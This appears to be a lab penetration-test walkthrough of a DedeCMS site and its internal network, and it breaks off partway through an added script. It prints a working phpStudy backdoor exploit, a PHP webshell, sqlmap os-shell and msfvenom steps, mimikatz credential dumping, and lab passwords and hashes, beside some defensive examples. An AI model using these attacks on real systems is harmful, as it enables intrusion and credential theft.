Contents
Target site: http://new.cc123.com/member/
Project network topology
1. Information gathering
Host discovery with netdiscover
sudo netdiscover -i eth0 -r 192.168.3.0/24
Port and service scanning
Two tools were used for this; the first is nmap, run over the full port range with service detection and the output saved to nmap.a:
nmap -A 192.168.3.134 -p- -oN nmap.a
kali@ToolsScannerKali20201:~/Desktop$ nmap -A 192.168.3.134 -p- -oN nmap.a
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-05 05:42 EST
Nmap scan report for 192.168.3.134
Host is up (0.00052s latency).
Not shown: 65526 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Microsoft DNS 6.1.7601 (1DB1446A) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB1446A)
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
135/tcp open msrpc Microsoft Windows RPC
999/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Microsoft-IIS/7.5
|_http-title: phpMyAdmin
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2021-02-05T10:44:48+00:00; 0s from scanner time.
6588/tcp open http Microsoft IIS httpd 7.5
| http-cookie-flags:
| /:
| ASPSESSIONIDSQSRBBAD:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: \xBB\xA4\xCE\xC0\xC9\xF1\xA1\xA4\xD6\xF7\xBB\xFA\xB4\xF3\xCA\xA6 V3.5.1 - \xC7\xB0\xCC\xA8\xB5\xC7\xC2\xBC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 227.24 seconds
The http-title on port 6588 is GBK-encoded; decoded it reads 护卫神·主机大师 V3.5.1 - 前台登录 (Huweishen Host Master V3.5.1, front-end login), a Windows hosting control panel, and port 999 serves its phpMyAdmin. The host also runs a DNS server, so local name resolution (the system resolver or /etc/hosts) can be pointed at it to resolve the lab's domain names.
Subdomain collection
Brute-forcing virtual hosts with wfuzz: each wordlist entry is sent in the Host header, and --hw 53 hides responses with 53 words, the word count of the default page returned for an unknown Host (establish that baseline first with a name that cannot exist):
wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u cc123.com -H "Host:FUZZ.cc123.com" --hw 53
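The Host-header brute force above, written out as an added example (not from the write-up): it measures a baseline response for a name that cannot exist and reports every wordlist entry whose response differs in word count, which is what --hw 53 does by hand. The target server is a constructed stand-in started in-process so the script runs offline; against the real host, replace the URL with http://192.168.3.134/ and drop the local server.

```python
"""Virtual-host brute force with a baseline filter (what wfuzz --hw does).

Added example, not from the original write-up. The target server is a
constructed in-process stand-in so the script runs offline.
"""
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed vhost table for the stand-in server: any unknown Host value
# gets DEFAULT_PAGE, which is what the baseline request measures.
VHOSTS = {
    "new.cc123.com": "new site " * 30,                          # 60 words
    "ww2.cc123.com": "ww2 corporate site with more words " * 12,  # 72 words
}
DEFAULT_PAGE = "IIS7 default page " * 10                        # 30 words


class _Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        body = VHOSTS.get(self.headers.get("Host", ""), DEFAULT_PAGE).encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_test_server():
    """Start the stand-in server on a free loopback port; returns (server, port)."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), _Handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def word_count(url, host):
    """Fetch url with a forged Host header and return the body's word count."""
    req = urllib.request.Request(url, headers={"Host": host})
    with urllib.request.urlopen(req, timeout=5) as resp:
        return len(resp.read().decode(errors="replace").split())


def find_vhosts(url, domain, words):
    """Labels whose Host response differs in word count from the baseline.

    The baseline is a Host value that certainly does not exist; --hw 53 is
    the manual form of this, hiding every response of 53 words.
    """
    baseline = word_count(url, "nonexistent-baseline." + domain)
    found = []
    for w in words:
        if word_count(url, f"{w}.{domain}") != baseline:
            found.append(w)
    return found


if __name__ == "__main__":
    srv, port = start_test_server()
    try:
        print(find_vhosts(f"http://127.0.0.1:{port}/", "cc123.com",
                          ["www", "new", "mail", "ww2", "dev"]))
    finally:
        srv.shutdown()
```

Filtering on word count rather than status code matters here because every Host value returns 200; only the body length distinguishes a real virtual host from the default site.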
Directory scan of new.cc123.com
kali@ToolsScannerKali20201:~/Desktop$ gobuster dir -u http://new.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://new.cc123.com
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/02/05 07:30:44 Starting gobuster
===============================================================
/images (Status: 301)
/news (Status: 301)
/contact (Status: 301)
/about (Status: 301)
/faq (Status: 301)
/help (Status: 301)
/uploads (Status: 301)
/data (Status: 301)
/a (Status: 301)
/Images (Status: 301)
/News (Status: 301)
/member (Status: 301)
/FAQ (Status: 301)
/special (Status: 301)
/m (Status: 301)
/Contact (Status: 301)
/About (Status: 301)
/install (Status: 301)
/Help (Status: 301)
/plus (Status: 301)
/A (Status: 301)
/M (Status: 301)
/include (Status: 301)
/cp (Status: 301)
/NEWS (Status: 301)
/skin (Status: 301)
/case (Status: 301)
/INSTALL (Status: 301)
/CP (Status: 301)
/IMAGES (Status: 301)
/Data (Status: 301)
/Special (Status: 301)
/Uploads (Status: 301)
/Member (Status: 301)
/Faq (Status: 301)
/Install (Status: 301)
/CONTACT (Status: 301)
/Include (Status: 301)
/ABOUT (Status: 301)
/HELP (Status: 301)
/DATA (Status: 301)
/CASE (Status: 301)
/Skin (Status: 301)
/Case (Status: 301)
===============================================================
2021/02/05 07:31:13 Finished
===============================================================
The directory layout (/plus, /include, /member, /special, /data, /install, /a, /m, /uploads) is the stock DedeCMS structure; searching Baidu for the listed directories identifies the CMS and points to its known issues.
Directory scan of ww2.cc123.com
2. Exploitation
Target site: http://new.cc123.com/member/
SQL injection when adding a category
The dumped hash is 20 hex characters, not the 32 of a full MD5 digest: DedeCMS stores passwords as substr(md5($pwd), 5, 20), i.e. characters 6 to 25 of the digest, and that is the form to submit to a hash lookup service. It cracks to admin7788:
812df726be884ddcfc41 admin7788
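Cracking that truncated format offline, as an added example (not from the write-up): the wordlist is constructed, and the demo target is derived from a constructed password so the run checks itself; feed crack() the dumped value 812df726be884ddcfc41 and a real wordlist to reproduce the lookup the write-up did online.

```python
"""Cracking the 20-character truncated MD5 used for the admin password.

Added example, not from the write-up. DedeCMS stores admin passwords as
substr(md5($pwd), 5, 20). WORDS is a constructed wordlist.
"""
import hashlib
import re

WORDS = ["123456", "admin", "password", "admin888", "admin7788"]  # constructed


def classify_hash(h):
    """Name the format from length; only the formats met in this write-up."""
    if not re.fullmatch(r"[0-9a-fA-F]+", h):
        return "unknown"
    return {32: "md5", 20: "md5-substr-5-20"}.get(len(h), "unknown")


def full_md5(password):
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def truncated_md5(password):
    """DedeCMS form: hex digest characters 5..24 (20 chars)."""
    return full_md5(password)[5:25]


def crack(target, wordlist):
    """Return the first word whose (truncated or full) MD5 equals target."""
    target = target.strip().lower()
    kind = classify_hash(target)
    if kind == "unknown":
        raise ValueError(f"unsupported hash format: {target!r}")
    hasher = full_md5 if kind == "md5" else truncated_md5
    for word in wordlist:
        word = word.rstrip("\r\n")
        if hasher(word) == target:
            return word
    return None


if __name__ == "__main__":
    print(classify_hash("812df726be884ddcfc41"))
    print(crack(truncated_md5("admin7788"), WORDS))
    print(crack("812df726be884ddcfc41", WORDS))
```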
With the cracked password we log in to the admin backend.
Upload a PHP one-liner to get a webshell.
AntSword connects to it but cannot execute commands (typically because the hosting panel has disabled PHP's command-execution functions).
So we upload an ASP "big shell" as well, plus an ASP script that scans for writable directories.
Generate a reverse-shell payload with msfvenom, upload it and run it to get a reverse shell.
Privilege escalation with MSF
Checking for local privilege-escalation vulnerabilities
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
msf5 post(multi/recon/local_exploit_suggester) > run
meterpreter > shell
chcp 65001    (switch the cmd.exe code page to UTF-8 so the output is not garbled)
flag1
flag2
Target site: ww2.cc123.com
kali@ToolsScannerKali20201:~/Desktop$ gobuster dir -u http://ww2.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "aspx,html"
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://ww2.cc123.com
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: aspx,html
[+] Timeout: 10s
===============================================================
2021/02/05 08:50:39 Starting gobuster
===============================================================
/admin (Status: 301)
/index.aspx (Status: 200)
/index.html (Status: 200)
/product.aspx (Status: 200)
/product.html (Status: 200)
/News.aspx (Status: 200)
/News.html (Status: 200)
/template (Status: 301)
/About.aspx (Status: 200)
/About.html (Status: 200)
/Index.aspx (Status: 200)
/Index.html (Status: 200)
/style (Status: 301)
/about.aspx (Status: 200)
/about.html (Status: 200)
[ERROR] 2021/02/05 08:50:58 [!] Get http://ww2.cc123.com/messages.html: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/editor (Status: 301)
/message.aspx (Status: 200)
/message.html (Status: 200)
/stat.aspx (Status: 200)
/NEWS.aspx (Status: 200)
/NEWS.html (Status: 200)
/index_html (Status: 200)
/index_html.aspx (Status: 200)
/index_html.html (Status: 200)
[ERROR] 2021/02/05 08:51:09 [!] Get http://ww2.cc123.com/Product.html: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/news2.html (Status: 200)
/news1.html (Status: 200)
/uc (Status: 301)
/INDEX.aspx (Status: 200)
/INDEX.html (Status: 200)
/Admin (Status: 301)
/Template (Status: 301)
/news3.html (Status: 200)
/about1.html (Status: 200)
/news01.html (Status: 200)
/Message.aspx (Status: 200)
/Message.html (Status: 200)
/about2.html (Status: 200)
/Style (Status: 301)
/news11.html (Status: 200)
/news4.html (Status: 200)
/news03.html (Status: 200)
/news5.html (Status: 200)
/upimg (Status: 301)
/Messages.html (Status: 200)
/news06.html (Status: 200)
/news02.html (Status: 200)
/news04.html (Status: 200)
/news12.html (Status: 200)
/about3.html (Status: 200)
/news10.html (Status: 200)
/news16.html (Status: 200)
/product1.html (Status: 200)
/news8.html (Status: 200)
/news17.html (Status: 200)
/news15.html (Status: 200)
/news9.html (Status: 200)
/STYLE (Status: 301)
/news23.html (Status: 200)
/news7.html (Status: 200)
/news13.html (Status: 200)
/news05.html (Status: 200)
/News2.html (Status: 200)
/news6.html (Status: 200)
/news20.html (Status: 200)
/news21.html (Status: 200)
/news14.html (Status: 200)
/news25.html (Status: 200)
/Editor (Status: 301)
/product3.html (Status: 200)
/product2.html (Status: 200)
/ABOUT.aspx (Status: 200)
/ABOUT.html (Status: 200)
/UC (Status: 301)
/news18.html (Status: 200)
/news19.html (Status: 200)
/PRODUCT.aspx (Status: 200)
/PRODUCT.html (Status: 200)
/news22.html (Status: 200)
/news28.html (Status: 200)
/News1.html (Status: 200)
/news003.html (Status: 200)
/about4.html (Status: 200)
/news001.html (Status: 200)
/news48.html (Status: 200)
/news30.html (Status: 200)
/news26.html (Status: 200)
/product02.html (Status: 200)
/news55.html (Status: 200)
/news07.html (Status: 200)
/news09.html (Status: 200)
/news29.html (Status: 200)
/TEMPLATE (Status: 301)
===============================================================
2021/02/05 09:01:13 Finished
===============================================================
The login form of the admin backend is vulnerable to SQL injection: the username is concatenated into the query, so commenting out the rest of the WHERE clause bypasses the password check.
The login check is probably a query of this shape, with the injected username admin'-- (the + is the URL-encoded space) turning the password comparison into a comment:
select * from user where username = 'admin'--+' and password = *****
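A minimal reproduction of that bypass next to the fix, as an added example (not the site's code): the user table and credentials are constructed, and an in-memory SQLite database stands in for the MSSQL backend, where -- is also a line comment.

```python
"""Login bypass through string-built SQL, beside the parameterised fix.

Added example; the table and credentials are constructed and SQLite stands in
for the site's MSSQL backend ('--' starts a comment in both).
"""
import sqlite3


def make_db():
    """Constructed stand-in for the CMS admin table."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users (username text, password text)")
    con.execute("insert into users values ('admin', 'S3cret!')")
    return con


def vulnerable_query(username, password):
    """What the page's login probably does: splice the input into the SQL text."""
    return ("select * from users where username = '" + username +
            "' and password = '" + password + "'")


def vulnerable_login(con, username, password):
    # With username admin'--  the query becomes
    #   select * from users where username = 'admin'-- ' and password = '...'
    # and everything after -- is a comment: the password is never checked.
    return con.execute(vulnerable_query(username, password)).fetchone() is not None


def safe_login(con, username, password):
    # Placeholders send the values separately from the SQL text, so a quote or
    # comment marker in the input is compared as data, not parsed as SQL.
    sql = "select * from users where username = ? and password = ?"
    return con.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_query("admin'-- ", "wrong"))
    print("vulnerable:", vulnerable_login(db, "admin'-- ", "wrong"))
    print("parameterised:", safe_login(db, "admin'-- ", "wrong"))
```

The same payload against the parameterised query simply fails to match any row, because the driver never lets the input become part of the statement text.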
A parameter of the backend's edit-information form is also injectable. Save the POST request to a file and hand it to sqlmap:
sqlmap -r sqlpost.txt --batch
Getting a shell with sqlmap
The backend DBMS is given with --dbms (a bare "mssql" argument is not accepted by sqlmap):
sudo sqlmap -r sqlpost.txt --dbms mssql -v 1 --dbs
sudo sqlmap -r sqlpost.txt --dbms mssql -v 1 --os-shell
On MSSQL, --os-shell runs commands through xp_cmdshell, which sqlmap re-enables via sp_configure when the connecting account is privileged enough.
The shell reports the IP 10.10.1.128, which shows the commands run on a separate internal database server: the web and database tiers are split.
Obtaining flag3
.NET code audit
Download the site's compiled assemblies from the bin directory and decompile them (for example with ILSpy or dnSpy) to audit the login and edit handlers:
meterpreter > download c:/HwsHostMaster/wwwroot/ww2cc123_55m39g/web/bin
3. Internal network penetration
Internal information gathering
Network interfaces
meterpreter > ipconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:71:98:af
MTU : 1500
IPv4 Address : 192.168.3.134
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::c1e2:d216:9dad:969b
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 12
============
Name : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:c0a8:386
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 13
============
Name : Intel(R) PRO/1000 MT Network Connection #2
Hardware MAC : 00:0c:29:71:98:b9
MTU : 1500
IPv4 Address : 10.10.10.135
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::2c1c:e958:d8c2:1189
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 14
============
Name : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:a0a:a87
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
The two NICs give the host two addresses:
192.168.3.134 / 10.10.10.135
Routing information
meterpreter > run get_local_subnets
Two subnets: 192.168.3.0/24 (external) and 10.10.10.0/24 (internal).
Hash dumping
meterpreter > run hashdump
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 20401422a21274279449907862e9d520...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c933df09b600efabee0791aaccc43f2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
MySQL_HWS:1001:aad3b435b51404eeaad3b435b51404ee:6a75a75e4cfd3cf00faf743e17e90a53:::
PhpMyAdmin_HWS:1002:aad3b435b51404eeaad3b435b51404ee:a14b615c584d6b043f42f1cfab9779cd:::
huweishen542147:1004:aad3b435b51404eeaad3b435b51404ee:c76eea2615348c5228f7027d3ccab02d:::
cc123:1005:aad3b435b51404eeaad3b435b51404ee:afdeb425b4a55982deb4e80fa3387576:::
newcc123:1007:aad3b435b51404eeaad3b435b51404ee:97824315153b4dd665d6c688f446ebf1:::
ww2cc123:1008:aad3b435b51404eeaad3b435b51404ee:adadf2dd832421c26a96705fd09a32bd:::
Dumping plaintext credentials with mimikatz
migrate 1500
Migrate first into a stable process whose architecture matches the OS (on this 64-bit Server 2008 R2, a 64-bit SYSTEM process), otherwise mimikatz running from a 32-bit meterpreter fails to read LSASS. The mimikatz extension is deprecated in current Metasploit; load kiwi provides the same functions (creds_all).
load mimikatz
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords
Output from the wdigest and tspkg providers (fields: session ; package ; host ; user ; password):
0;6131477 NTLM WIN-KALKEMT3JMA cc123 Ht6_ifp6nvkjn
0;14708785 NTLM WIN-KALKEMT3JMA newcc123 ZtKGmDj0qEbDECSBl5p
0;8663175 NTLM WIN-KALKEMT3JMA newcc123 ZtKGmDj0qEbDECSBl5p
0;771729 NTLM WIN-KALKEMT3JMA Administrator !@#Qwe123.
Adding a route
run autoroute -s 10.10.10.0/24
Discovering live internal hosts
Host discovery with MSF (ARP scan through the session)
meterpreter > run post/windows/gather/arp_scanner rhosts=10.10.10.0/24
Port scan (this first scan targets 10.10.10.135, which is the compromised web server's own internal interface; the new host the ARP scan reveals is 10.10.10.136, which is scanned through the SOCKS proxy further down)
msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.10.10.135
msf5 auxiliary(scanner/portscan/tcp) > exploit
[+] 10.10.10.135: - 10.10.10.135:21 - TCP OPEN
[+] 10.10.10.135: - 10.10.10.135:53 - TCP OPEN
[+] 10.10.10.135: - 10.10.10.135:80 - TCP OPEN
[+] 10.10.10.135: - 10.10.10.135:139 - TCP OPEN
[+] 10.10.10.135: - 10.10.10.135:135 - TCP OPEN
[+] 10.10.10.135: - 10.10.10.135:445 - TCP OPEN
[+] 10.10.10.135: - 10.10.10.135:999 - TCP OPEN
^C[*] 10.10.10.135: - Caught interrupt from the console...
[*] Auxiliary module execution completed
meterpreter > run post/windows/gather/arp_scanner rhosts=10.10.10.0/24
[*] Running module against WIN-KALKEMT3JMA
[*] ARP Scanning 10.10.10.0/24
[+] IP: 10.10.10.1 MAC 00:50:56:c0:00:13 (VMware, Inc.)
[+] IP: 10.10.10.135 MAC 00:0c:29:71:98:b9 (VMware, Inc.)
[+] IP: 10.10.10.136 MAC 00:0c:29:43:9b:46 (VMware, Inc.)
[+] IP: 10.10.10.254 MAC 00:50:56:eb:d5:a8 (VMware, Inc.)
[+] IP: 10.10.10.255 MAC 00:0c:29:71:98:b9 (VMware, Inc.)
meterpreter > background
[*] Backgrounding session 2...
Starting a SOCKS proxy
msf5 > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 2222
msf5 auxiliary(server/socks4a) > options
msf5 auxiliary(server/socks4a) > run
nmap through the proxy
Add "socks4 127.0.0.1 2222" to the proxy list in /etc/proxychains.conf (the module binds to 0.0.0.0:2222 by default; in Metasploit 6 it is auxiliary/server/socks_proxy with VERSION 4a):
sudo vim /etc/proxychains.conf
Only a full TCP connect scan can traverse SOCKS, so use -sT and skip host discovery with -Pn (SYN and ICMP probes do not go through the proxy); expect it to be slow, this one took over 1000 seconds:
sudo proxychains nmap -sT -Pn 10.10.10.136
Nmap scan report for 10.10.10.136
Host is up (1.1s latency).
Not shown: 988 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1066.56 seconds
The shell sqlmap gives us is not interactive, so we instead use the ASPX shell from earlier to connect to the database (with the credentials below) and upload a bind shell that we then connect to.
Reading Web.config for the database credentials
<add key="ConnectionString" value="server=WIN-JJU7KU45PN7;database=grcms_data;uid=sa;pwd=!@#a123.." />
The connection string uses the sa account, the highest MSSQL privilege, which is why --os-shell (xp_cmdshell) worked; a web application should connect as a least-privilege database user.
Generating a bind shell with msfvenom
msfvenom -p windows/meterpreter/bind_tcp LPORT=54321 -f exe > shell.exe
A bind payload is used because the database server sits on 10.10.10.0/24 and 10.10.1.0/24 with no route back to the attacker: it listens on the target, and Metasploit connects to it through the autoroute added earlier.
Upload the bind shell and run it
Connecting to the bind shell from MSF
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 10.10.10.136
set lport 54321
run
Database server information gathering
Hash dump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:15132c3d36a7e5d7905e02b478979046:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Plaintext credentials from mimikatz
[0] { Administrator ; WIN-JJU7KU45PN7 ; !@#QWEasd123. }
[1] { Administrator ; WIN-JJU7KU45PN7 ; !@#QWEasd123. }
[2] { WIN-JJU7KU45PN7 ; Administrator ; !@#QWEasd123. }
IPv4 Address : 10.10.1.128
IPv4 Netmask : 255.255.255.0
IPv4 Address : 10.10.10.136
IPv4 Netmask : 255.255.255.0
Local subnet: 10.10.1.0/255.255.255.0
Local subnet: 10.10.10.0/255.255.255.0
The database server is dual-homed as well: 10.10.10.136 faces the web server, 10.10.1.128 faces a further subnet.
Scanning the next internal subnet
run autoroute -s 10.10.1.0/24
run post/windows/gather/arp_scanner rhosts=10.10.1.0/24
Target IP: 10.10.1.129
Port scan
[+] 10.10.1.129: - 10.10.1.129:80 - TCP OPEN
[+] 10.10.1.129: - 10.10.1.129:135 - TCP OPEN
[+] 10.10.1.129: - 10.10.1.129:139 - TCP OPEN
[+] 10.10.1.129: - 10.10.1.129:445 - TCP OPEN
[+] 10.10.1.129: - 10.10.1.129:3306 - TCP OPEN
Browsing 10.10.1.129:80 through the proxy
proxychains firefox http://10.10.1.129
Exploiting the phpStudy backdoor
The site runs on phpStudy, whose bundled php_xmlrpc.dll was backdoored: when a request carries Accept-Encoding: gzip,deflate, the DLL base64-decodes the Accept-Charset header and executes it as PHP. A small Python script for the backdoor:
# coding: utf-8
# phpStudy backdoor: base64-encoded PHP in Accept-Charset is executed when
# Accept-Encoding is exactly "gzip,deflate". Usage: python3 phpstudayexp.py "<cmd>"
import base64
import sys
import requests

url = "http://10.10.1.129/"
cmd = sys.argv[1]
payload = "system('" + cmd + "');"
payload_b64 = base64.b64encode(payload.encode("utf-8")).decode("ascii")
headers = {"Accept-Charset": payload_b64, "Accept-Encoding": "gzip,deflate"}

def exploit(target):
    # The response body carries the command output produced by system().
    return requests.get(url=target, headers=headers, timeout=10).text

print(exploit(url))
Writing a PHP one-liner webshell. The command runs under cmd.exe, so < and > are escaped with ^ for the remote shell, while \$ and \" protect the PHP from the local bash:
proxychains python3 ./phpstudayexp.py "echo ^<?php @eval(\$_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php"
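The defensive counterpart of that exploit, as an added example (not from the write-up): detection logic that flags backdoor requests in logged request headers by decoding Accept-Charset and looking for PHP in it. The request records are constructed; in practice they would come from a reverse proxy or WAF log.

```python
"""Flagging phpStudy-backdoor requests in web logs.

Added example, not from the write-up. The backdoored php_xmlrpc.dll shipped
with phpStudy base64-decodes the Accept-Charset header and eval()s it when
Accept-Encoding is gzip,deflate. SAMPLE_REQUESTS is constructed.
"""
import base64
import binascii
import re

# PHP an attacker would smuggle through the header; the exploit above sends
# system('<cmd>');
PHP_MARKERS = re.compile(
    r"\b(system|exec|shell_exec|passthru|eval|assert|popen)\s*\(|<\?php", re.I)


def decode_accept_charset(value):
    """Strict base64 decode of the header; None for an ordinary charset name."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def backdoor_payload(headers):
    """Return the decoded PHP if the request matches the trigger, else None."""
    h = {k.lower(): v for k, v in headers.items()}
    # The DLL checks for "gzip,deflate" without a space; spaces are stripped
    # here so a normalised log entry still matches.
    if h.get("accept-encoding", "").replace(" ", "").lower() != "gzip,deflate":
        return None
    decoded = decode_accept_charset(h.get("accept-charset", ""))
    if decoded and PHP_MARKERS.search(decoded):
        return decoded
    return None


def scan(records):
    """(index, decoded payload) for every flagged request record."""
    hits = []
    for i, hdrs in enumerate(records):
        payload = backdoor_payload(hdrs)
        if payload is not None:
            hits.append((i, payload))
    return hits


SAMPLE_REQUESTS = [  # constructed header sets, as a proxy or WAF would log them
    {"Host": "10.10.1.129", "Accept-Encoding": "gzip, deflate, br",
     "Accept-Charset": "utf-8"},
    {"Host": "10.10.1.129", "Accept-Encoding": "gzip,deflate",
     "Accept-Charset": base64.b64encode(b"system('whoami');").decode()},
    {"Host": "10.10.1.129", "Accept-Encoding": "gzip,deflate",
     "Accept-Charset": base64.b64encode(b"iso-8859-1").decode()},
]

if __name__ == "__main__":
    for idx, php in scan(SAMPLE_REQUESTS):
        print(f"request {idx}: backdoor payload {php!r}")
```

Real browsers never send a base64 blob as Accept-Charset, so the second condition is the discriminator; the Accept-Encoding check only cuts noise.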
Connecting to the PHP one-liner with AntSword through the proxy
Changing the proxy address
AntSword runs on the physical host, not inside Kali, so its SOCKS proxy setting must point at Kali's IP and port 2222 rather than 127.0.0.1; the socks4a module listens on 0.0.0.0 by default, so Kali's address is reachable, whereas 127.0.0.1 makes the connection from the physical machine fail. (/etc/proxychains.conf only affects tools run through proxychains on Kali itself.)
Uploading an MSF bind shell
Information gathering on the internal target
Administrator:500:aad3b435b51404eeaad3b435b51404ee:15132c3d36a7e5d7905e02b478979046:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : target
BootKey : 317aebcebbff049827a6e7f1c7c8bc2e
Rid : 500
User : Administrator
LM :
NTLM : 15132c3d36a7e5d7905e02b478979046
Rid : 501
User : Guest
LM :
NTLM :
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; TARGET ; !@#QWEasd123. }
[1] { TARGET ; Administrator ; !@#QWEasd123. }
[2] { Administrator ; TARGET ; !@#QWEasd123. }
The Administrator NTLM hash and plaintext (!@#QWEasd123.) are identical to those on the database server WIN-JJU7KU45PN7: the same local administrator password is reused across the internal hosts.
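That reuse is the kind of thing to check mechanically across every dump collected during an engagement. As an added example (not from the write-up), the script below parses pwdump-format lines, reports NT hashes shared between hosts (pass-the-hash or the cracked password then moves laterally without any further exploit), blank-password accounts, and any host still storing real LM hashes. The hash lines are the ones printed above; the host labels are attached here from the write-up.

```python
"""Spotting password reuse and blank passwords across dumped SAM hashes.

Added example, not from the write-up. DUMPS holds the pwdump lines printed
by hashdump / samdump::hashes above, labelled with the host they came from.
"""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

DUMPS = {  # host label -> pwdump lines (user:rid:lm:nt:::)
    "WIN-KALKEMT3JMA": [
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c933df09b600efabee0791aaccc43f2:::",
        "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
        "cc123:1005:aad3b435b51404eeaad3b435b51404ee:afdeb425b4a55982deb4e80fa3387576:::",
    ],
    "WIN-JJU7KU45PN7": [
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:15132c3d36a7e5d7905e02b478979046:::",
        "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    ],
    "target": [
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:15132c3d36a7e5d7905e02b478979046:::",
        "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    ],
}


def parse_pwdump(line):
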